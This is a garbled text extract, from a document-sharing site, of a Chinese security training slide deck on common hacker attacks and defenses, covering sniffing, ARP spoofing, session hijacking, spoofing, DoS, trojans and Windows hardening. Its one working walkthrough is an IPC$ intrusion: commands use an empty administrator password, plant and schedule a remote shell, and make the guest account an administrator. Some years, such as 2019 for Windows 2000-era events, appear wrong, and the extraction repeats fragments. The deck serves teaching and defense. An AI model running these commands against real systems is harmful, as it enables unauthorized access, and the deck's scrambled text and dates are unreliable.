版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、常见黑客攻击与防范绿盟科技 于慧龙常见黑客攻击与防范绿盟科技 于慧龙提纲常见的黑客攻击方法常用的安全防范措施提纲常见的黑客攻击方法常见的黑客攻击方法常见的黑客攻击方法19801985199020192000密码猜测可自动复制的代码密码破解利用已知的漏洞破坏审计系统后门会话劫持擦除痕迹嗅探包欺骗GUI远程控制自动探测扫描拒绝服务www 攻击工具攻击者入侵者水平攻击手法半开放隐蔽扫描控制台入侵检测网络管理DDOS 攻击2019高入侵技术的发展19801985199020192000密码猜测可自动复制的采用漏洞扫描工具选择会用的方式入侵获取系统一定权限提升为最高权限安装系统后门获取敏感信息或者其他攻
2、击目的入侵系统的常用步骤采用选择获取提安装获取敏感信息入侵系统的常用步骤端口判断判断系统选择最简方式入侵分析可能有漏洞的服务获取系统一定权限提升为最高权限安装多个系统后门清除入侵脚印攻击其他系统获取敏感信息作为其他用途较高明的入侵步骤端口判断选择分析获取提安装清除攻击其获取敏作为其较高明的入侵2019年中美黑客大战事件背景和经过4.1撞机事件为导火线4月初,以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了 “五一卫国网战”战前声明,宣布将在5月
3、1日至8日,对美国网站进行大规模的攻击行动。各方都得到第三方支援各大媒体纷纷报道,评论,中旬结束大战2019年中美黑客大战事件背景和经过PoizonB0 x、pr0phet更改的网页中经网数据有限公司中国科学院心理研究所国内某政府网站国内某大型商业网站PoizonB0 x、pr0phet更改的网页中经网数据有限公国内黑客组织更改的网站页面美国劳工部网站美国某节点网站美国某大型商业网站美国某政府网站国内黑客组织更改的网站页面美国劳工部网站美国某节点网站美国某这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下: “我们更多的是一种不满情绪的发泄
4、,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统, 这个行动在技术上是没有任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名和密码 SQL server缺省安装微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错
5、误远程安全漏洞拒绝服务 (syn-flood , ping )这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和密码入侵者利用黑客工具扫描系统用户获得用户名和简单密码这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和这次事件中被利用的典型漏洞Windows 2000登录验证机制可被绕过这次事件中被利用的典型漏洞Windows 2000登录验证机常见的安全攻击方法直接获取口令进入系统:网络监听,暴力破解利用系统自身安全漏洞特洛伊木马程序:伪装成工具程序或者游戏等诱使用户打开或下载,然后使用户在无意中激活,导致系统后门
6、被安装WWW欺骗:诱使用户访问纂改过的网页电子邮件攻击:邮件炸弹、邮件欺骗网络监听:获取明文传输的敏感信息通过一个节点来攻击其他节点:攻击者控制一台主机后,经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S)常见的安全攻击方法直接获取口令进入系统:网络监听,暴力破解一次利用ipc$的入侵过程1. C:net use x.x.x.xIPC$ “” /user:“admintitrators” 用流光扫到的用户名是administrators,密码为“空”的IP地址2. C:copy srv.exe x.x.x
7、.xadmin$ 先复制srv.exe上去,在流光的Tools目录下3. C:net time x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2019/3/19 上午 11:00,命令成功完成。4. C:at x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:net time x.x.x.x再查查时间到了没有,如果x.x.x.x 的当前时间是 2019/3/19 上午 11:05,那就准备开始下面的命令。6. C:telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认
8、的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了一次利用ipc$的入侵过程1. C:net use 一次利用ipc$的入侵过程7.C:copy ntlm.exe admin$ntlm.exe也在流光的Tools目录中8. C:WINNTsystem32ntlm 输入ntlm启动(这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开
9、启Telnet服务)9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组10. C:net user guest /active:yes 11. C:net user guest 1234 将Guest的密码改为123412. C:net localgroup administrators guest /add 将Guest变为Administrator一次利用ipc$的入侵过程7.C:copy ntlm.e网络监听及防范技术网络窃听是指通过截获他人网络上通信的数据流,并非法从中提取重要信息的一种方法间接性利用现有网络协议的一些漏洞
10、来实现,不直接对受害主机系统的整体性进行任何操作或破坏隐蔽性网络窃听只对受害主机发出的数据流进行操作,不与主机交换信息,也不影响受害主机的正常通信网络监听及防范技术网络窃听是指通过截获他人网络上通信的数据流网络监听及防范技术共享式局域网下共享式局域网采用的是广播信道,每一台主机所发出的帧都会被全网内所有主机接收到一般网卡具有以下四种工作模式:广播模式、多播模式、直接模式和混杂模式网卡的缺省工作模式是广播模式和直接模式,即只接收发给自己的和广播的帧网络监听及防范技术共享式局域网下共享式局域网采用网络监听及防范技术共享式局域网下使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地
11、址,则提交给上层处理程序,否则丢弃此数据当网卡工作于混杂模式的时候,它不做任何判断,直接将接收到的所有帧提交给上层处理程序共享式网络下窃听就使用网卡的混杂模式 网络监听及防范技术共享式局域网下使用MAC地址来网络监听及防范技术共享式局域网下网络监听及防范技术共享式局域网下网络监听及防范技术交换式局域网下在数据链路层,数据帧的目的地址是以网卡的MAC地址来标识ARP协议实现的配对寻址 ARP请求包是以广播的形式发出,正常情况下只有正确IP地址与的主机才会发出ARP响应包,告知查询主机自己的MAC地址。局域网中每台主机都维护着一张ARP表,其中存放着地址对。 网络监听及防范技术交换式局域网下在数据
12、链路层,数网络监听及防范技术交换式局域网下ARP改向的中间人窃听A发往B:(MACb,MACa,PROTOCOL,DATA)B发往A:(MACa,MACb,PROTOCOL,DATA)A发往B:(MACx,MACa,PROTOCOL,DATA)B发往A:(MACx,MACb,PROTOCOL,DATA)网络监听及防范技术交换式局域网下ARP改向的中间网络监听及防范技术交换式局域网下X分别向A和B发送ARP包,促使其修改ARP表主机A的ARP表中B为主机B的ARP表中A为X成为主机A和主机B之间的“中间人”网络监听及防范技术交换式局域网下X分别向A和B发网络监听及防范技术网络窃听的被动防范 分割
13、网段细化网络会使得局域网中被窃听的可能性减小 使用静态ARP表手工输入地址对 采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖,而采用基于IP地址的交换加密SSH、SSL、IPSec网络监听及防范技术网络窃听的被动防范 分割网段网络监听及防范技术网络窃听的主动防范共享式局域网下的主动防范措施伪造数据包构造一个含有正确目标IP地址和一个不存在目标MAC地址各个操作系统处理方式不同,一个比较好的MAC地址是FF-FF-FF-FF-FF-FE性能分析向网络上发送大量包含无效MAC地址的数据包,窃听主机会因处理大量信息而导致性能下降 网络监听及防范技术网络窃听的主动防范共享式局域网下网络监听
14、及防范技术网络窃听的主动防范交换式局域网下的主动防范措施监听ARP数据包 监听通过交换机或者网关的所有ARP数据包,与预先建立的数据库相比较 定期探测数据包传送路径 使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查,并与备份的合法路径作比较使用SNMP定期轮询ARP表 网络监听及防范技术网络窃听的主动防范交换式局域网下IP欺骗及防范技术会话劫持一般欺骗会话劫持IP欺骗及防范技术会话劫持一般欺骗会话劫持IP欺骗及防范技术会话劫持会话劫持攻击的基本步骤发现攻击目标确认动态会话猜测序列号关键一步,技术难点使被冒充主机下线伪造FIN包,拒绝服务攻击接管会话IP欺
15、骗及防范技术会话劫持会话劫持攻击的基本步IP欺骗及防范技术会话劫持猜测序列号TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号 选择恰当时间,在数据流中插入一个欺骗包,服务器将接受这个包,并且更新ACK序列号;然而客户主机仍继续使用老的SEQ序列号,而没有察觉我们的欺骗包IP欺骗及防范技术会话劫持猜测序列号IP欺骗及防范技术防范技术没有有效的办法可以从根本上防范会话劫持攻击所有会话都加密保护实现困难使用安全协议(SSH、VPN)保护敏感会话对网络数据流采取限制保护措施被动措施IP欺骗及防范技术防范技术没有有效的办法可以从根本上防范电子邮件欺骗及防范技术案例2019年6月初,一些在
16、中国工商银行进行过网上银行注册的客户,收到了一封来自网络管理员的电子邮件,宣称由于网络银行系统升级,要求客户重新填写用户名和密码。这一举动随后被工行工作人员发现,经证实是不法分子冒用网站公开信箱,企图窃取客户的资料。虽然没有造成多大的损失,但是这宗典型的电子邮件欺骗案例当时曾在国内安全界和金融界掀起了轩然大波,刺激人们针对信息安全问题展开了更加深切的讨论。 电子邮件欺骗及防范技术案例2019年6月初,电子邮件欺骗及防范技术原理发送邮件使用SMTP(即简单邮件传输协议)SMTP协议的致命缺陷:过于信任原则SMTP假设的依据是:不怀疑邮件的使用者的身份和意图伪装成为他人身份向受害者发送邮件可以使用
17、电子邮件客户端软件,也可以远程登录到25端口发送欺骗邮件电子邮件欺骗及防范技术原理发送邮件使用SMT电子邮件欺骗及防范技术防范查看电子邮件头部信息不仅指出了是否有人欺骗了电子邮件,而且指出了这个信息的来源 采用SMTP身份验证机制使用与POP协议收取邮件时相同的用户名/密码PGP邮件加密以公钥密码学(Public Key Cryptology) 为基础的 电子邮件欺骗及防范技术防范查看电子邮件头部信Web欺骗及防范技术概念人们利用计算机系统完成具有安全需求的决策时往往是基于屏幕的显示 页面、URL图标、图片时间的先后顺序攻击者创造一个完整的令人信服的Web世界,但实际上它却是一个虚假的复制 攻
18、击者控制这个虚假的Web站点,受害者浏览器和Web之间所有网络通信完全被攻击者截获 Web欺骗及防范技术概念人们利用计算机系统完Web欺骗及防范技术概念Web欺骗及防范技术概念Web欺骗及防范技术原理URL地址改写dhshacker/dhs/攻击者改写Web页中的所有URL地址,使它们指向攻击者的Web服务器不是真正的Web服务器 Web欺骗及防范技术原理URL地址改写Web欺骗及防范技术原理欺骗过程用户单击经过改写后的hacker/dhs/;hacker/向dhs/请求文档;dhs/向hacker/返回文档;hacker/改写文档中的所有URL;hacker/向用户返回改写后的文档 Web欺
19、骗及防范技术原理欺骗过程Web欺骗及防范技术原理隐藏纰漏由于JavaScript能够对连接状态栏写操作,而且可以将JavaScript操作与特定事件绑定在一起。攻击者完全可以将改写的URL状态恢复为改写前的状态。JavaScript、ActiveX等技术使Web欺骗变得更为可信。 Web欺骗及防范技术原理隐藏纰漏Web欺骗及防范技术防范技术检查页面的源代码禁用JavaScrip、ActiveX等脚本语言确保应用有效和能适当地跟踪用户会话ID 使用尽可能长的随机数教育是非常重要的Web欺骗及防范技术防范技术检查页面的源代码拒绝服务攻击(DoS)SYN (我可以连接吗?)ACK (可以)/SYN(
20、请确认!)攻击者受害者伪造地址进行SYN请求为何还没回应就是让你白等不能建立正常的连接拒绝服务攻击(DoS)SYN (我可以连接吗?)ACK (可DoS攻击技术DDoS技术DoS攻击技术DDoS技术特洛伊木马木马不同于病毒,但经常被视作病毒处理,随计算机自动启动并在某一端口进行侦听;木马的实质只是一个通过端口进行通信的网络客户/服务程序特洛伊木马的种类远程控制型输出shell型信息窃取型其它类型特洛伊木马木马不同于病毒,但经常被视作病毒处理,随计算机自动Netbus客户端程序Netbus客户端程序NetBus传输 NetBus使用TCP建立会话。缺省情况下用12345端口进行连接,12346端
21、口进行数据传输跟踪NetBus的活动比较困难。可以通过检查12346端口数据来确定许多类似的程序使用固定的端口,你可以扫描整个的网络监测可疑的活动。简单方法netstat -anNetBus传输 NetBus使用TCP建立会话。缺省情况下反弹型特洛伊木马可穿透防火墙,控制局域网机器服务器端主动发起连接,控制端监听80端口自动上线通知Email发送读取主页空间的某个文件网络神偷、灰鸽子、魔法控制解决方法安装防病毒软件和个人防火墙检查可疑的进程和监听端口提高安全警惕性反弹型特洛伊木马可穿透防火墙,控制局域网机器网络神偷工作原理连接方式服务器端主动发起连接到客户端80端口Server:1026 Cl
22、ient:80服务端上线通知原理利用Email利用主页空间网络神偷工作原理连接方式网络神偷主界面网络神偷主界面网络神偷主界面网络神偷主界面TCP/IP的每个层次都存在攻击TelnetSMTPDNSFTPUDPTCPIP以太网无线网络SATNETARPNET应用程序攻击拒绝服务攻击数据监听和窃取硬件设备破坏电磁监听TCP/IP的每个层次都存在攻击TelnetSMTPDNSF混合型、自动的攻击 WorkstationVia EmailFile ServerWorkstationMail ServerInternet混合型攻击:蠕虫Web ServerVia Web PageWorkstationW
23、eb ServerMail Gateway攻击的发展趋势防病毒防火墙入侵检测风险管理混合型、自动的攻击 WorkstationFile Serv攻击的发展趋势漏洞趋势 严重程度中等或较高的漏洞急剧增加,新漏洞被利用越来越容易(大约60%不需或很少需用代码) 混合型威胁趋势将病毒、蠕虫、特洛伊木马和恶意代码的特性与服务器和 Internet 漏洞结合起来而发起、传播和扩散的攻击,例:红色代码和尼姆达等。 主动恶意代码趋势制造方法:简单并工具化 技术特征:智能性、攻击性和多态性,采用加密、变换、插入等技术手段巧妙地伪装自身,躲避甚至攻击防御检测软件.表现形式:多种多样,没有了固定的端口,没有了更多
24、的连接,甚至发展到可以在网络的任何一层生根发芽,复制传播,难以检测。受攻击未来领域即时消息:MSN,Yahoo,ICQ,OICQ等对等程序(P2P)移动设备攻击的发展趋势漏洞趋势 常见的安全防范措施常见的安全防范措施常用的安全防范措施物理层网络层路由交换策略VLAN划分防火墙、隔离网闸入侵检测抗拒绝服务传输加密系统层漏洞扫描系统安全加固SUS补丁安全管理应用层防病毒安全功能增强管理层独立的管理队伍统一的管理策略常用的安全防范措施物理层 访问控制 认证 NAT 加密 防病毒、内容过滤 流量管理常用的安全防护措施防火墙 访问控制 加密常用的安全防护措施防火墙入侵检测系统 FirewallInter
25、netServersDMZIDS AgentIntranet监控中心router攻击者发现攻击发现攻击发现攻击报警报警IDS Agent入侵检测系统 FirewallInternetServer漏洞扫描系统Internet地方网管scanner监控中心地方网管地方网管地方网管地方网管漏洞扫描系统Internet地方网管scanner监控中心地市场部工程部router开发部InternetServersFirewall漏洞扫描产品应用市场部工程部router开发部InternetServers拒绝服务攻击(DoS/DDoS)网络层SYN FloodICMP FloodUDP FloodPing
26、of Death应用层垃圾邮件CGI资源耗尽拒绝服务攻击(DoS/DDoS)网络层企业级防病毒体系集中管理多次防病毒体系企业级防病毒体系集中管理系统安全加固基本安全配置检测和优化密码系统安全检测和增强系统后门检测提供访问控制策略和工具增强远程维护的安全性文件系统完整性审计增强的系统日志分析系统升级与补丁安装系统安全加固基本安全配置检测和优化Windows系统安全加固使用Windows update安装最新补丁;更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全;卸载不需要的服务;将暂时不需要开放的服务停止;限制特定执行文件的权
27、限;设置主机审核策略;调整事件日志的大小、覆盖策略;禁止匿名用户连接;删除主机管理共享;限制Guest用户权限;安装防病毒软件、及时更新病毒代码库;安装个人防火墙。Windows系统安全加固使用Windows update安Windows系统安全加固使用Windows update安装最新补丁;更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全;将默认Administrator用户和组改名,禁用Guests并将Guest改名;开启安全审核策略;卸载不需要的服务;将暂时不需要开放的服务停止;限制特定执行文件的权限;调整事件日志的
28、大小、覆盖策略;禁止匿名用户连接;删除主机管理共享;安装防病毒软件、个人防火墙。Windows系统安全加固使用Windows update安优化注册表增强安全性限制空连接HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值: RestrictNullSessAccess类型: REG_DWORD数值: 1限制来宾和空登陆身份查看事件日志HKEY_Local_MACHINESystemCurrentControlSetServicesEventLogApplication Security System
29、键值:RestrictGuestAccess类型:REG_DWORD数值:1优化注册表增强安全性限制空连接优化注册表增强安全性限制服务器显示在网络列表中HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值: hidden类型: REG_DWORD数值: 1审核备份还原时间HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值:FullPrivilegeAuditng类型:REG_DWORD数值:1优化注册表增强安全性限制服务器显示在网络列表中优化注册表增强安全性不显示最后登陆名HKEY_Local_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWinlogon键值: DontDisplayLastUserName类型
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 绿化项目现场监理方案
- 休克护理的职业道德
- 废旧木料颗粒化生产流程优化方案
- 不同类型膀胱痉挛的护理要点
- 地质实验员成果考核试卷含答案
- 风电机组机械装调工成果知识考核试卷含答案
- 苯基氯硅烷生产工安全实践强化考核试卷含答案
- 活塞式发动机修理工安全文明强化考核试卷含答案
- 炼焦工安全强化测试考核试卷含答案
- 岩矿鉴定员风险识别竞赛考核试卷含答案
- 深度强化学习在机器人控制中的应用-深度研究
- 人工智能导论-第2版-全套课件
- 《智慧物流与供应链》课件-项目八 智慧物流与供应链管理的运作模式
- 2024年部编版高考语文一轮复习必背重点:古代文化常识
- GB/T 4706.27-2024家用和类似用途电器的安全第27部分:风扇的特殊要求
- DL∕T 1965-2019 回转式翻车机系统运行维护导则
- 公司及部门年度经营责任书(模板)
- MH-T 5002-2020运输机场总体规划规范
- 甲磺酸奥希替尼片-临床用药解读
- 医务人员职业风险与防护课件
- 9《那个星期天》课件
评论
0/150
提交评论